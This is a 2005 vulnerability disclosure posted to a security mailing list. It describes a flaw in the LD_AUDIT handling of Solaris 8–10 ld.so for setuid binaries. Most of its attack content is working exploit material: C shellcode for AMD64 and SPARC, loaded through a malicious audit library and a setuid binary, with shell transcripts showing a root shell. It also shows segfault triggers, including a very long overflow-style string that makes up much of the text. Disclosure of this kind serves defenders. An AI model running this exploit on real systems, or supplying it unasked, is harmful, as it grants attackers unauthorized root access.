From: Przemyslaw Frasunek
Organization: czuby.net
Date: Tue, 28 Jun 2005 18:40:16 +0200
To: securesoftware@list.cr.yp.to
Subject: [local] [control] Solaris ld.so LD_AUDIT vulnerability
Message-ID: <42C17D70.3080403@freebsd.lublin.pl>

ld.so from Solaris 8, 9 and 10 doesn't check the LD_AUDIT environment variable when running s[ug]id binaries, allowing arbitrary code to be run with elevated privileges.

This vulnerability was introduced by one of the recent patches for Solaris 9, possibly 112963. Ld.so patched with 112963-08 is not vulnerable -- it does not allow LD_AUDIT for set[ug]id binaries, but upgrading to 112963-16 or even the latest 112963-19 definitely makes ld.so exploitable. Up-to-date Solaris 8 boxes are also vulnerable. Solaris 10 boxes are vulnerable, both patched and unpatched. Generic Solaris 8 and 9 are not vulnerable.
Example on unpatched Solaris 10 (AMD64):

    atari:venglin:~> cat dupa.c
    static char sh[] =
    "\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\x42\x06\xeb\x0d\xe8\xf2\xff\xff\xff\x9a\x01\x01\x01\x01\x07\x01\xc3\x50\xb0\x17\xe8\xf0\xff\xff\xff\x31\xc0\x68\x2f\x73\x68\x5f\x68\x2f\x62\x69\x6e\x88\x44\x24\x07\x89\xe3\x50\x53\x8d\x0c\x24\x8d\x54\x24\x04\x52\x51\x53\xb0\x0b\xe8\xcb\xff\xff\xff";

    int la_version() {
            void (*f)();
            f = (void*)sh;
            f();
            return 3;
    }
    atari:venglin:~> gcc -fPIC -shared -o /tmp/dupa.so dupa.c
    atari:venglin:~> setenv LD_AUDIT /tmp/dupa.so
    atari:venglin:~> su
    # id
    uid=0(root) gid=10(staff)

Solaris 9 on SPARC:

    $ cat dupa.c
    char sh[] =
    /* setuid() */
    "\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
    /* execve() */
    "\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
    "\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
    "\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";

    int la_version() {
            void (*f)();
            f = (void*)sh;
            f();
            return 3;
    }
    $ gcc -fPIC -shared -o /tmp/dupa.so dupa.c
    $ export LD_AUDIT=/tmp/dupa.so
    $ ping
    # id
    uid=0(root) gid=100(student)

Additionally, we have two segfaults:

    atari:venglin:~> setenv LD_AUDIT :
    atari:venglin:~> su
    Segmentation fault
    atari:venglin:~> unsetenv LD_AUDIT
    atari:venglin:~> setenv LD_AUDIT `perl -e 'print "A"x1024'`
    atari:venglin:~> su
    ld.so.1: su: warning: su: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA